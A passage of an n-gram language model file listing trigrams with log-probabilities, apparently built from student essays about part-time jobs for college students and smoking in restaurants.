-0.886555 fees , and
-1.0807683 college , and
-0.7046587 money , and
-1.0080934 future , and
-0.39134806 first , and
-0.7371828 spend , and
-0.95045984 food , and
-0.95045984 friends , and
-0.886555 earn , and
-0.7371828 use , and
-0.7371828 specialty , and
-0.7371828 grades , and
-0.7371828 teachers , and
-0.95045984 university , and
-0.886555 night , and
-0.7371828 savings , and
-0.7371828 adult , and
-0.7295443 education , and
-0.98632365 world , and
-0.7371828 multitasking , and
-0.886555 supplies , and
-0.7371828 assignments , and
-0.886555 come , and
-0.7371828 needs , and
-0.7371828 resting , and
-0.7371828 solution , and
-0.7371828 tasks , and
-0.98632365 hours , and
-0.7371828 home , and
-0.886555 responsibility , and
-0.886555 independence , and
-0.7371828 enormous , and
-0.7371828 company , and
-0.7371828 individual , and
-0.7371828 manager , and
-0.95045984 teamwork , and
-0.7371828 dressed , and
-0.7371828 children , and
-0.7371828 spending , and
-0.886555 materials , and
-0.7371828 etiquette , and
-0.7371828 diligence , and
-0.7371828 outlook , and
-0.7371828 nations , and
-0.7371828 smoking , and
-0.7371828 standards , and
-0.7371828 poison , and
-0.89648646 productive employment and
-1.8181026 going to and
-0.937057 commuting to and
-1.4903399 of study and
-0.82286453 students study and
-0.82286453 uninteresting study and
-0.40733 for studying and
-0.78788686 in studying and
-1.0366805 time studying and
-1.375283 work experience and
-0.57957655 life experience and
-0.8451474 invaluable experience and
-0.7174656 time working and
-0.9008978 both working and
-0.7965408 a waiter and
-0.8699095 fast-food restaurant and
-0.91150343 driving there and
-1.5998166 the students and
-1.6071639 , students and
-0.59717906 fellow students and
-0.88586724 irresponsible students and
-0.88586724 needy students and
-0.8192614 creates stress and
-0.9317287 worked on and
-0.9613325 the studies and
-0.7891637 their studies and
-0.9613325 on studies and
-0.78166103 as less and
-0.78166103 doing less and
-1.3695166 of time and
-1.165016 available time and
-0.92728245 spend time and
-0.85555077 requires time and
-0.85555077 manage time and
-1.8734496 time jobs and
-0.8030546 , tired and
-1.1015922 the focus and
-0.77982485 poor quality and
-1.3487858 in school and
-0.81277865 their school and
-0.8082595 high school and
-0.9834833 for work and
-0.9834833 can work and
-1.1546277 part-time work and
-1.0473912 , work and
-1.2552977 to work and
-0.91490877 school work and
-1.1424766 hard work and
-0.91490877 class work and
-0.7570921 hierarchies work and
-0.7570921 respect work and
-0.82776713 level -LRB- and
-0.82776713 enough -LRB- and
-0.8494859 him -RRB- and
-0.8494859 bills -RRB- and
-0.8860644 better financial and
-0.9051738 the tuition and
-0.7503001 my tuition and
-0.4791212 their fees and
-0.55517733 tuition fees and
-0.4791212 tertiary fees and
-1.55037 of college and
-1.4446886 to college and
-0.8976566 than college and
-0.8425031 with money and
-0.39331436 of money and
-1.0061734 extra money and
-0.9315856 need money and
-1.0061734 earn money and
-0.8425031 make money and
-0.7054969 becomes money and
-0.7054969 between money and
-0.8986297 get you and
-0.8404093 me today and
-0.8871715 job market and
-0.6714977 highly competitive and
-0.76517963 a degree and
-0.7220824 is well and
-1.4625627 as well and
-0.7220824 works well and
-0.42256877 the benefits and
-1.5074806 the future and
-0.8312195 carefully consider and
-0.8791983 in academic and
-0.68108815 future ; and
-0.68108815 independence ; and
-0.68108815 expertise ; and
-0.9517022 , skills and
-0.9517022 academic skills and
-0.7823414 increase skills and
-0.7823414 obtain skills and
-0.51808417 team spirit and
-1.2520705 time management and
-1.1196725 go through and
-0.45323932 overall personality and
-0.45323932 inclined personality and
-0.98392856 for themselves and
-0.80389756 manage themselves and
-0.51808417 will expand and
-1.4974552 The first and
-0.8911989 adequate enough and
-1.5271415 to spend and
-0.8663443 buy food and
-1.1186132 is good and
-0.58299506 with others and
-0.7575283 that parents and
-0.9155363 the parents and
-0.66828793 their parents and
-0.5805192 with friends and
-0.500291 new friends and
-0.500291 My friends and
-0.500291 long friends and
-0.7376198 so again and
-0.8848768 from people and
-0.8848768 new people and
-1.6346626 <s> College and
-0.9201956 and when and
-0.6714977 is teaching and
-0.7965408 the theories and
-0.79425 of classes and
-0.79425 my classes and
-0.8502833 all useful and
-0.8961282 fs society and
-0.79888135 working itself and
-0.6837808 their grades and
-0.5843222 good grades and
-1.1232876 club activities and
-1.0413986 the social and
-0.84100085 learn social and
-0.51808417 become unwilling and
-0.9017385 father fs and
-1.1228715 of life and
-0.9693432 social life and
-0.9028055 about life and
-0.9028055 his life and
-0.7486409 everyday life and
-0.6714977 the realities and
-0.84033173 getting up and
-1.1345265 growing up and
-0.79888135 get immediate and
-1.1754589 their personal and
-0.8502833 , finances and
-0.6714977 the levels and
-0.8030546 future debt and
-0.7659851 any income and
-0.7659851 their income and
-0.7376198 people aware and
-0.94073325 financial pressures and
-0.89649045 to living and
-1.017962 living expenses and
-0.8765379 future family and
-0.8269828 become independent and
-0.65755117 more independent and
-0.81564915 negative factor and
-1.3029555 they graduate and
-0.7005967 , professional and
-0.7005967 future professional and
-0.8030546 academic ability and
-0.76990867 with customers and
-0.76990867 non-smoking customers and
-0.8646487 they enjoy and
-0.6714977 is flexible and
-0.8456982 every year and
-0.84361047 of education and
-0.6341634 quality education and
-0.6341634 school education and
-0.98500454 college education and
-0.6341634 my education and
-0.6341634 health education and
-1.4036958 the world and
-1.1378555 academic world and
-1.8525243 the value and
-1.0297275 for learning and
-1.1213851 , learning and
-0.51808417 explore talents and
-0.79888135 new interests and
-1.2249653 a full and
-0.94073325 these factors and
-0.7376198 their energy and
-0.7748844 or assignments and
-0.51808417 job rises and
-0.7965408 work ethic and
-0.51808417 start saving and
-0.8371417 is beneficial and
-0.88646513 precious years and
-0.8871715 , medicine and
-0.51808417 social circles and
-0.8404093 fs meet and
-0.553488 their books and
-0.47770286 needed books and
-0.47770286 purchase books and
-0.51808417 was huge and
-1.4221469 to go and
-0.8030546 adults now and
-0.7077215 different needs and
-0.7077215 basic needs and
-1.1065849 better understand and
-0.7748844 getting higher and
-0.51808417 the momentum and
-0.9805856 study hard and
-0.9805856 very hard and
-0.8030546 to concentrate and
-0.6714977 by active and
-0.641719 the government and
-0.6714977 more sophisticated and
-0.77982485 pecuniary insight and
-0.6554139 help universities and
-0.6554139 based universities and
-0.6714977 , productivity and
-0.51808417 practical manner and
-0.51808417 these issues and
-1.1440036 their families and
-0.8404093 in between and
-0.8947326 buy things and
-0.79888135 do basic and
-0.81564915 the tasks and
-0.6714977 and suffering and
-0.9479905 North America and
-0.97635806 , rent and
-0.7376198 customer service and
-0.8312195 for anything and
-0.8030546 , law and
-0.51808417 , unchallenging and
-0.6714977 vicious circle and
-0.8774438 24 hours and
-1.3033627 college days and
-1.261229 a week and
-0.8779626 this day and
-0.33287477 the home and
-0.33287477 from home and
-0.33287477 leave home and
-0.40496916 at home and
-0.33287477 staying home and
-0.33287477 family home and
-0.77152056 teaches responsibility and
-0.77152056 comes responsibility and
-0.7376198 , lunch and
-1.1491418 financial independence and
-0.6714977 big party and
-0.8030546 , drinking and
-0.5843222 social clubs and
-0.5843222 joining clubs and
-1.0359567 for companies and
-0.7965408 their character and
-0.51808417 on taxpayers and
-1.2061355 to obtain and
-0.76625526 to class and
-0.76625526 my class and
-0.64859325 between class and
-0.51808417 work record and
-0.53042823 to mature and
-0.53042823 are mature and
-0.33894214 the discipline and
-0.33894214 student discipline and
-0.33894214 of discipline and
-0.33894214 greater discipline and
-0.7965408 being organized and
-0.45323932 be diligent and
-0.45323932 is diligent and
-0.8108417 broadens interest and
-0.51808417 or dislikes and
-0.7376198 financial planning and
-0.51808417 the rigors and
-0.45323932 , confidence and
-0.45323932 little confidence and
-0.3308039 for guidance and
-0.3308039 providing guidance and
-0.51808417 writing essays and
-0.51808417 good friend and
-1.3291415 this opinion and
-0.6714977 are concentrated and
-0.8871715 a distraction and
-0.51808417 between childhood and
-0.6714977 can influence and
-0.7376198 conscious country and
-0.8371417 , save and
-0.51808417 for authority and
-0.6714977 <s> schools and
-0.51808417 including exploitation and
-0.51808417 and absenteeism and
-0.7965408 the classroom and
-0.8512615 social balance and
-0.3308039 of organizational and
-0.3308039 fs organizational and
-0.51808417 both presently and
-0.51808417 at interviews and
-0.51808417 society professionally and
-0.5843222 Living together and
-0.5843222 gather together and
-0.6714977 , meetings and
-0.7965408 is costly and
-0.7376198 both personally and
-0.51808417 get certified and
-0.6714977 expectations faster and
-0.8536918 their children and
-0.65755117 longer children and
-0.7376198 local community and
-0.51808417 more maturity and
-0.3308039 often wasted and
-0.3308039 greatly wasted and
-0.51808417 very lazy and
-0.5843222 fs growth and
-0.5843222 persons growth and
-0.7376198 always welcome and
-0.51808417 a well-paying and
-0.7376198 bank loan and
-0.51808417 in fashion and
-0.51808417 and technology and
-0.7376198 a low and
-0.51808417 University tuitions and
-0.51808417 the summers and
-0.51808417 before hiring and
-0.6714977 , dedication and
-0.6714977 Both private and
-0.51808417 for housing and
-0.51808417 their wings and
-0.51808417 are unsure and
-0.7965408 a boss and
-0.51808417 up quicker and
-0.51808417 latest games and
-0.7376198 critical thought and
-0.6714977 so spoiled and
-0.51808417 , courting and
-0.51808417 life style and
-0.51808417 into adulthood and
-0.51808417 balance expenditure and
-0.51808417 sit quietly and
-0.51808417 our feet and
-0.51808417 first paycheck and
-0.51808417 more cautious and
-0.7928865 potential health and
-0.7928865 personal health and
-0.51808417 to exercising and
-0.51808417 their resumes and
-0.51808417 the dormitory and
-0.6714977 the dorm and
-0.51808417 for awareness and
-0.6714977 a dollar and
-0.51808417 avoid drugs and
-0.51808417 married couples and
-0.51808417 material goods and
-0.6714977 getting smaller and
-0.51808417 poker tournament and
-0.51808417 in physics and
-0.7376198 as partying and
-0.98392856 the restaurants and
-0.98392856 at restaurants and
-0.51808417 do housework and
-0.51808417 both wrong-headed and
-0.51808417 be dispensed and
-0.51808417 is holy and
-0.51808417 relentless racism and
-0.51808417 be compromised and
-0.51808417 greater detail and
-0.51808417 , confident and
-0.6714977 long past and
-0.51808417 the maximum and
-0.6714977 get distracted and
-0.7748844 learned here and
-0.51808417 is compounded and
-0.51808417 , beer and
-0.84427166 introduce smoking and
-0.84427166 segregate smoking and
-1.5482439 to smoke and
-1.013883 the rights and
-0.94073325 public places and
-0.7965408 <s> Restaurants and
-0.51808417 , asthma and
-0.51808417 of appetite and
-0.51808417 the warnings and
-0.51808417 like UK and
-0.51808417 the welfare and
-0.6714977 a poison and
-0.51808417 permeates foods and
-0.7965408 the comfort and
-0.51808417 social pastime and
-1.6222497 may be of
-1.6298187 would be of
-1.6023883 is that of
-1.2646338 to that of
-0.90155673 ways that of
-1.1418319 than that of
-1.5758424 the job of
-0.91268986 simple job of
-0.92800885 grades is of
-0.92800885 burger is of
-1.931039 the student of
-1.2170563 not , of
-1.2170563 But , of
-0.94085634 in many of
-0.77496845 on many of
-0.77496845 since many of
-0.77496845 share many of
-0.9371312 many cases of
-0.7724225 innumerous cases of
-0.8981222 enjoy any of
-0.28392494 that field of
-0.33088547 the field of
-0.28392494 unrelated field of
-0.11853396 their field of
-0.28392494 related field of
-0.28392494 f field of
-0.28392494 -RRB- field of
-0.28392494 's field of
-0.28392494 specialized field of
-0.28392494 current field of
-1.9057608 , and of
-0.8059908 The nature of
-1.0220352 the course of
-0.77956766 chosen course of
-1.4490381 a little of
-0.98221105 that experience of
-0.7316363 the experience of
-0.98221105 useful experience of
-0.98221105 actual experience of
-0.06596292 the amount of
-0.09356618 considerable amount of
-0.06596292 small amount of
-0.09356618 significant amount of
-0.09356618 large amount of
-0.09356618 budgeted amount of
-0.8223625 The stress of
-0.3316378 the top of
-0.21343295 on top of
-1.1039206 is less of
-0.99560815 is one of
-0.81157833 also one of
-0.81157833 : one of
-0.31286377 the quality of
-0.5319525 lower quality of
-1.2556734 the work of
-0.9105461 choices -RRB- of
-1.4685214 <s> And of
-0.83977234 for some of
-0.6486388 use some of
-0.6486388 without some of
-0.6486388 just some of
-0.6486388 practice some of
-0.6486388 lose some of
-1.368325 do so of
-1.149994 , most of
-1.149994 in most of
-0.76830566 spend most of
-1.2851068 a degree of
-1.1922117 <s> Most of
-0.43534195 this level of
-0.43534195 a level of
-0.26778597 the level of
-0.9226535 university are of
-0.7779218 have ways of
-0.8437351 potential benefits of
-0.8535203 added benefit of
-1.4332008 a part of
-0.55063707 is part of
-0.89469254 the part of
-0.55063707 being part of
-0.3209676 important part of
-0.55063707 consume part of
-0.55063707 essential part of
-0.55063707 indispensable part of
-0.55063707 indeed part of
-0.89912343 the foundation of
-0.9101094 know more of
-0.8410733 cash potential of
-0.48269886 an understanding of
-0.48269886 's understanding of
-0.21790503 better understanding of
-0.83997875 the management of
-0.44111878 the knowledge of
-0.381484 more knowledge of
-0.381484 my knowledge of
-0.381484 REAL knowledge of
-1.0950018 the environment of
-0.7825354 continual increase of
-1.4842088 the first of
-0.57727504 the issue of
-1.4947908 <s> Many of
-1.2481797 not enough of
-0.9050274 no need of
-0.89184976 the good of
-0.20485121 the idea of
-0.3059415 little idea of
-0.3059415 an idea of
-0.3059415 better idea of
-0.3059415 fs idea of
-0.3059415 clear idea of
-1.5319782 their parents of
-0.8406158 If parents of
-1.156758 the chance of
-0.8592908 best use of
-1.2729907 I could of
-0.7404067 to opportunities of
-1.0728552 for all of
-1.0549766 of all of
-0.7609632 or all of
-0.9204871 spend all of
-0.7609632 complete all of
-1.0391383 college because of
-0.8395745 places because of
-0.3316378 the range of
-0.3316378 broad range of
-0.31286377 their area of
-0.5319525 fs area of
-0.8911092 their subject of
-0.3316378 another source of
-0.3316378 our source of
-1.1290729 in activities of
-0.51976305 is unworthy of
-0.5484505 the demands of
-0.33365712 a lot of
-0.88965493 future life of
-0.88965493 boring life of
-0.6738899 mundane realities of
-0.989523 the responsibilities of
-0.76066804 and responsibilities of
-0.6860101 a result of
-0.58609426 The result of
-0.6738899 the responsibly of
-0.6738899 the reality of
-0.6738899 high levels of
-0.7404067 am aware of
-0.8410733 cover expenses of
-0.51976305 a combination of
-1.2162403 a family of
-0.8059908 critical period of
-0.38230968 for development of
-0.24076203 the development of
-0.38230968 all-round development of
-0.62947315 a way of
-0.5405912 valuable way of
-0.5405912 or way of
-0.5405912 constructive way of
-1.0357691 financially independent of
-0.16369317 the majority of
-0.3316378 large majority of
-0.7640125 the ability of
-0.21298836 many aspects of
-0.21298836 other aspects of
-0.21298836 what aspects of
-0.51976305 to expect of
-0.2468743 a sense of
-0.28955266 better sense of
-0.28955266 growing sense of
-0.28955266 false sense of
-0.21298836 full-time member of
-0.21298836 -RRB- member of
-0.14377046 contributing member of
-0.8486773 their year of
-0.3316378 the type of
-0.21343295 any type of
-0.76456714 the world of
-0.8592908 the success of
-0.5319525 the burden of
-0.5319525 financial burden of
-0.3316378 the concept of
-0.21343295 little concept of
-0.045771595 the cost of
-0.18059649 The cost of
-0.18059649 true cost of
-0.18059649 actual cost of
-0.18059649 full cost of
-0.26207307 the importance of
-0.65955615 The importance of
-0.4941905 and out of
-0.4941905 most out of
-0.4941905 coming out of
-0.4941905 move out of
-0.4941905 fresh out of
-0.4941905 dropped out of
-0.4941905 drop out of
-0.07908349 the value of
-0.5160295 true value of
-0.5995218 real value of
-0.8020919 the interests of
-0.6738899 full extent of
-0.8286453 the impact of
-0.51976305 resulting reduction of
-0.51976305 the relevance of
-0.6738899 true determination of
-0.51976305 the particulars of
-0.7404067 all areas of
-1.2846382 <s> Some of
-0.68666714 from those of
-0.68666714 than those of
-0.68666714 behind those of
-0.34126893 final years of
-0.7030647 four years of
-0.59958875 16 years of
-0.59958875 45 years of
-0.31008765 a taste of
-0.20136651 the taste of
-0.31008765 first taste of
-0.83997875 Independent means of
-0.27543268 student outside of
-0.27543268 jobs outside of
-0.27543268 people outside of
-0.27543268 living outside of
-0.27543268 live outside of
-0.27543268 opinions outside of
-0.7779218 full load of
-0.83605236 universities much of
-0.83605236 stem much of
-0.7825354 efficient performance of
-0.51976305 last weeks of
-0.47066337 the costs of
-0.48025998 and costs of
-0.48025998 increasing costs of
-0.7404067 a matter of
-0.22786619 the lack of
-0.22786619 to lack of
-0.22786619 The lack of
-0.22786619 or lack of
-0.7460558 the process of
-0.7779218 whole practice of
-1.1831393 not always of
-0.7779218 severely short of
-1.0263747 the problem of
-0.8223625 immediate effect of
-0.8747623 future workplace of
-0.28955266 working instead of
-0.28955266 earning instead of
-0.28955266 education instead of
-0.28955266 tips instead of
-0.7779218 the concern of
-0.51976305 little bit of
-0.51976305 the confines of
-0.14793482 the rest of
-0.8640698 the lives of
-0.7404067 a sample of
-0.51976305 the delights of
-0.6738899 next round of
-1.4986086 <s> Students of
-0.8020919 the rent of
-1.0687017 the freedom of
-0.33968225 the purpose of
-0.3934904 main purpose of
-0.33968225 sole purpose of
-0.33968225 entire purpose of
-0.65955615 real waste of
-0.65955615 complete waste of
-0.6738899 your circle of
-0.88032144 25 hours of
-1.27016 a week of
-0.8810427 Their day of
-0.27713037 the risk of
-0.45445842 at risk of
-0.6738899 added frustration of
-1.4146034 <s> First of
-0.4030567 the responsibility of
-0.9393304 and responsibility of
-0.3316378 my list of
-0.3316378 aforementioned list of
-0.51976305 personal satisfaction of
-0.8020919 the University of
-0.84641343 a point of
-0.51976305 a backdrop of
-0.51976305 of lots of
-0.6738899 practical applications of
-0.6738899 more background of
-0.14918531 productive members of
-0.14918531 all members of
-0.14918531 adult members of
-0.14918531 Family members of
-0.95198864 the expectations of
-0.51976305 the rules of
-0.51976305 wider array of
-0.7825354 diminished possibilities of
-0.14918531 a kind of
-0.14918531 some kind of
-0.14918531 are kind of
-0.10312651 what kind of
-0.51976305 and dynamics of
-0.6738899 either side of
-0.7404067 a manager of
-0.3316378 to loss of
-0.3316378 causes loss of
-0.51976305 the danger of
-0.7404067 main causes of
-0.51976305 the love of
-0.51976305 the destiny of
-0.6738899 all institutions of
-0.9514858 the right of
-0.5259497 the youth of
-0.45445842 The youth of
-0.6738899 the virtues of
-0.51976305 and abuse of
-0.51976305 gross negligence of
-0.6738899 main purposes of
-0.3316378 lose sight of
-0.3316378 complete sight of
-0.51976305 four corners of
-0.85488534 the balance of
-0.799734 the decision of
-0.51976305 the attainment of
-0.6738899 consist mainly of
-0.799734 the challenges of
-0.51976305 in favor of
-0.16369317 a variety of
-0.3316378 wider variety of
-0.22786619 valuable form of
-0.22786619 the form of
-0.22786619 some form of
-0.22786619 other form of
-0.51976305 than capable of
-0.3316378 an appreciation of
-0.3316378 Early appreciation of
-0.51976305 long length of
-0.6738899 the path of
-0.51976305 the content of
-0.7404067 high expense of
-0.91485167 the pressure of
-0.30747035 large percentage of
-0.51976305 take notice of
-0.9811984 primary goal of
-0.21343295 take care of
-0.3316378 taken care of
-0.10312651 a number of
-0.14918531 the number of
-0.14918531 large number of
-0.10312651 total number of
-0.51976305 a dime of
-0.30747035 the requirements of
-0.51976305 the failures of
-0.51976305 and undecided of
-0.30747035 the direction of
-0.7404067 Most kids of
-0.51976305 in possession of
-0.3316378 receiving thousands of
-0.3316378 kills thousands of
-0.51976305 thought-controlling atmosphere of
-0.51976305 recommended norms of
-0.51976305 extended periods of
-0.51976305 repeated bouts of
-0.30747035 <s> One of
-0.6188963 the efforts of
-0.5319525 their efforts of
-0.51976305 obtain control of
-0.51976305 the security of
-0.3316378 encourage thoughts of
-0.3316378 explore thoughts of
-0.51976305 the joys of
-0.51976305 the pain of
-0.51976305 THEIR interpretation of
-0.51976305 all walks of
-0.51976305 the myriad of
-0.3316378 small amounts of
-0.3316378 outrageous amounts of
-0.22941051 in terms of
-0.6738899 the beginning of
-0.51976305 the impression of
-0.51976305 peculiar sort of
-0.51976305 the detriment of
-0.28574196 the health of
-0.55685854 and health of
-0.51976305 new phase of
-0.5319525 social ideas of
-0.5319525 main ideas of
-0.51976305 the remainder of
-0.3316378 the pursuit of
-0.3316378 his pursuit of
-0.51976305 Any forms of
-0.51976305 do dropout of
-0.51976305 the image of
-0.51976305 the acquisition of
-0.51976305 great dollops of
-0.6738899 a minimum of
-0.51976305 obscene perversion of
-0.6738899 academic attention of
-0.51976305 on behalf of
-0.799734 that none of
-0.51976305 the foremost of
-0.51976305 overall efficacy of
-0.30747035 be plenty of
-0.51976305 the entrance of
-0.51976305 to feelings of
-0.6738899 , regardless of
-0.51976305 health concerns of
-0.51976305 worst sufferers of
-0.14918531 the effects of
-0.14918531 health effects of
-0.14918531 ill effects of
-0.14918531 harmful effects of
-0.51976305 makes hundreds of
-0.6738899 the interference of
-0.51976305 and parts of
-0.51976305 restaurants despite of
-0.51976305 means infringement of
-0.51976305 The smell of
-0.799734 the comfort of
-2.3284578 of a nature
-1.6716202 , by nature
-0.947483 its very nature
-2.3051038 <s> The nature
-0.88792825 our true nature
-2.6966972 <s> I completely
-2.0467944 that is completely
-1.2669065 employment in completely
-0.9696175 party and completely
-1.4509012 I am completely
-0.9246814 -LRB- without completely
-2.7458208 part-time job unrelated
-0.86376655 is completely unrelated
-1.2487434 in an unrelated
-0.8768929 more reasons to
-0.97420084 main reasons to
-1.0356766 three reasons to
-0.73031056 excellent reasons to
-0.88755226 leave it to
-1.1177621 do it to
-1.1177621 make it to
-1.7590013 should be to
-1.1677622 would be to
-0.5588796 with having to
-0.8031702 , having to
-0.5588796 by having to
-0.7073471 and having to
-0.40460834 of having to
-0.32447994 without having to
-1.6601943 a job to
-1.9133228 part-time job to
-1.7755494 time job to
-1.3674722 student is to
-1.3682886 , is to
-1.1576488 restaurant is to
-1.4218755 This is to
-1.2569262 what is to
-0.85192233 area is to
-1.2569262 life is to
-1.3384877 which is to
-0.85192233 goal is to
-0.88501513 be valuable to
-0.8104003 this student to
-0.76637393 a student to
-1.1891465 the student to
-1.1092662 college student to
-0.8104003 cloistered student to
-0.85291755 after graduation to
-0.9086295 experience , to
-1.6591724 students , to
-1.4943287 studies , to
-1.561148 work , to
-1.1542058 i.e. , to
-0.9086295 earned , to
-0.9086295 partially , to
-1.3619043 second , to
-0.9086295 bed , to
-1.27854 is not to
-1.2191526 , not to
-0.999246 important not to
-0.81395614 people not to
-0.81395614 best not to
-0.81395614 growth not to
-0.81541586 from case to
-0.9365024 worlds in to
-1.5605719 , and to
-1.0882597 themselves and to
-0.6996763 friends and to
-1.0882597 customers and to
-1.0882597 needs and to
-0.8699467 days and to
-1.336546 home and to
-1.0882597 diligent and to
-0.8699467 housing and to
-0.45172024 job unrelated to
-0.45172024 completely unrelated to
-0.8272194 have chosen to
-0.64961874 reason has to
-0.7676003 one has to
-0.7676003 who has to
-0.64961874 world has to
-0.64961874 someone has to
-0.68331456 valuable experience to
-1.043413 and experience to
-0.84226954 hand experience to
-1.4453467 from working to
-0.89786196 only working to
-0.91058034 student as to
-0.91058034 far as to
-0.435649 Another reason to
-0.27475208 for students to
-1.1764132 the students to
-0.41260415 college students to
-0.39066103 helps students to
-1.0331011 help students to
-0.73509085 encourage students to
-0.38775066 all students to
-0.73509085 allowing students to
-0.73509085 encourages students to
-0.8836072 expose students to
-0.73509085 requires students to
-0.6160119 allows students to
-0.73509085 enables students to
-0.73509085 want students to
-0.8836072 assist students to
-0.73509085 pushing students to
-0.73509085 inspire students to
-0.903169 and also to
-0.87127405 much less to
-0.67386734 the time to
-1.0545759 their time to
-0.73068815 ample time to
-0.8774222 less time to
-0.38920784 have time to
-0.73068815 or time to
-0.67605966 more time to
-0.38920784 enough time to
-0.73068815 take time to
-1.0216594 fs time to
-0.73068815 find time to
-0.73068815 excellent time to
-0.44812647 is available to
-0.27405852 time available to
-0.44812647 jobs available to
-0.44812647 Jobs available to
-1.5959704 part-time jobs to
-1.5787758 time jobs to
-0.84952116 offering jobs to
-1.3077376 for one to
-0.1485141 cases unable to
-0.1485141 and unable to
-0.1485141 thus unable to
-0.1485141 are unable to
-1.3844416 to work to
-0.8926488 sufficient work to
-0.8926488 generally work to
-0.13344447 be related to
-0.04255451 job related to
-0.09276951 is related to
-0.13344447 not related to
-0.13344447 work related to
-0.13344447 are related to
-0.13344447 all related to
-0.09276951 directly related to
-0.13344447 responsibility related to
-0.8464918 enough -RRB- to
-1.0501419 etc. -RRB- to
-0.40692312 , only to
-0.78654397 money only to
-0.78654397 history only to
-0.721105 is necessary to
-0.76848745 skills necessary to
-0.80291003 can have to
-0.70640576 will have to
-0.85491836 and have to
-0.81340414 students have to
-0.9015334 may have to
-0.80291003 only have to
-0.9726623 they have to
-0.67626476 skills have to
-0.9015334 who have to
-0.5765109 ft have to
-0.67626476 people have to
-0.8834614 would have to
-0.3704176 we have to
-0.67626476 thereby have to
-0.67626476 woman have to
-1.1303846 the money to
-0.84011203 their money to
-0.7037515 little money to
-1.002963 extra money to
-0.8970901 enough money to
-0.9286521 need money to
-1.002963 earn money to
-0.9771276 save money to
-0.7711173 society - to
-0.43292513 will begin to
-0.43292513 students begin to
-0.43292513 likely begin to
-0.84234536 <s> or to
-1.4013506 , or to
-0.84234536 study or to
-0.84234536 tuition or to
-1.1252277 do well to
-0.66852593 may appear to
-1.7120872 students are to
-0.7711173 several ways to
-0.3708232 several benefits to
-0.6773939 many benefits to
-0.93840593 your part to
-0.32976374 In order to
-0.038731158 in order to
-0.8777381 school ; to
-0.4388467 contribute more to
-0.51599467 more attractive to
-0.67953897 employment helps to
-0.67953897 industry helps to
-1.1697705 their skills to
-0.6227832 it important to
-1.0211118 is important to
-1.0651363 very important to
-0.35042372 's important to
-0.8002564 most important to
-0.7327168 are important to
-0.6227832 skills important to
-0.7327168 all important to
-0.004128754 be able to
-0.042674154 is able to
-0.059844032 not able to
-0.059844032 then able to
-0.059844032 only able to
-0.034184407 are able to
-0.059844032 were able to
-0.059844032 was able to
-0.042674154 Being able to
-0.80045015 dedicating themselves to
-0.80045015 exposing themselves to
-1.4591602 the first to
-0.77258974 not enough to
-0.61999524 earn enough to
-0.61999524 fortunate enough to
-0.34933895 old enough to
-1.2412258 the food to
-1.5123683 <s> Having to
-0.5151397 the need to
-0.4452719 will need to
-0.4452719 often need to
-0.4452719 and need to
-0.26824608 students need to
-0.4452719 force need to
-0.4452719 essentially need to
-0.8490858 on others to
-0.8705675 fd like to
-1.030891 the parents to
-1.5126449 their parents to
-1.1605529 young people to
-1.0143895 to see to
-0.81151307 and effort to
-0.66852593 as keeping to
-0.32976374 are willing to
-0.32976374 more willing to
-0.32976374 , trying to
-0.16294363 are trying to
-0.08911633 a chance to
-0.34841016 the chance to
-0.43292513 best chance to
-0.7163103 little use to
-0.7163103 normally use to
-1.3515105 and what to
-0.91064435 them all to
-0.20727918 the opportunity to
-0.45028245 The opportunity to
-0.40964338 an opportunity to
-0.45028245 no opportunity to
-0.45282257 for them to
-0.59915435 encourage them to
-0.59915435 allowing them to
-0.59915435 force them to
-0.13313693 allows them to
-0.59915435 enables them to
-0.7025134 preparing them to
-0.59915435 cause them to
-0.59915435 encouraging them to
-0.59915435 guide them to
-0.87067914 young Japanese to
-0.69958204 very useful to
-0.69958204 extremely useful to
-0.14312786 be expected to
-0.2119523 not expected to
-0.2119523 are expected to
-0.94553316 <s> Learning to
-0.51599467 's external to
-0.86245567 I get to
-0.86245567 They get to
-0.73416126 areas relevant to
-0.81151307 the colleges to
-1.1161627 club activities to
-0.66852593 are sufficient to
-0.35216606 , how to
-0.3029759 in how to
-0.3029759 students how to
-0.3029759 you how to
-0.3029759 them how to
-0.15201639 learning how to
-0.15201639 learn how to
-0.3029759 understand how to
-0.3029759 taught how to
-1.2948811 a lot to
-1.1705978 school life to
-0.45172024 workforce prior to
-0.45172024 exists prior to
-0.8852968 onto university to
-0.43292513 become used to
-0.43292513 well used to
-0.43292513 are used to
-0.7593176 is up to
-0.7593176 entirely up to
-0.7593176 add up to
-0.17974027 it difficult to
-0.31826448 be difficult to
-0.17974027 is difficult to
-0.31826448 often difficult to
-0.27258074 been difficult to
-0.27258074 sometimes difficult to
-1.505216 to make to
-0.52853036 with regard to
-0.52853036 With regard to
-0.81541586 on loans to
-0.8665724 additional income to
-0.9060262 with which to
-0.9358045 a way to
-0.77151406 best way to
-0.06702199 can lead to
-0.28935957 , lead to
-0.19569385 may lead to
-0.28935957 ultimately lead to
-0.30578586 with regards to
-0.81151307 important factor to
-0.41493955 the ability to
-0.58211726 their ability to
-0.8719748 restaurant customers to
-1.1613337 a sense to
-0.66852593 allowing businesses to
-0.51599467 In contrast to
-0.91301733 from education to
-1.2499849 academic world to
-0.111225836 , going to
-0.16163372 not going to
-0.111225836 and going to
-0.16163372 as going to
-0.19659074 time going to
-0.16163372 : going to
-0.16163372 are going to
-0.16163372 when going to
-0.111225836 while going to
-0.16163372 always going to
-0.16163372 Balancing going to
-0.66852593 training ground to
-0.81151307 herself entirely to
-0.73416126 means '' to
-0.91985255 a place to
-0.6773939 another place to
-0.8306861 paramount importance to
-1.1322751 go out to
-0.8923176 of where to
-0.84514 educational value to
-1.0127025 the transition to
-0.7994119 college campus to
-0.7037232 is learning to
-0.74459434 , learning to
-0.7037232 and learning to
-0.60010767 as learning to
-0.60010767 been learning to
-0.66852593 colleges continue to
-0.79490125 and interests to
-0.66852593 may translate to
-0.66852593 The answer to
-0.66852593 in question to
-0.7764603 not limited to
-0.51599467 Considerations pertaining to
-0.51599467 in relation to
-0.32976374 -LRB- relative to
-0.32976374 important relative to
-0.80637354 In addition to
-0.31379578 in addition to
-0.66852593 they stand to
-0.61471933 and decide to
-0.52853036 they decide to
-0.44526792 will start to
-0.5411668 they start to
-0.44526792 we start to
-0.44526792 smooth start to
-0.71815115 will learn to
-0.6114328 , learn to
-0.6532639 to learn to
-0.76047236 also learn to
-0.6114328 should learn to
-0.76047236 must learn to
-0.6573871 financial lessons to
-0.6573871 those lessons to
-0.73416126 country areas to
-0.73416126 business contacts to
-0.51599467 student intends to
-0.88146377 college than to
-0.6975849 it just to
-0.6975849 income just to
-0.5428381 , possible to
-0.5428381 quite possible to
-0.5428381 always possible to
-0.882481 for years to
-0.8822992 a lesson to
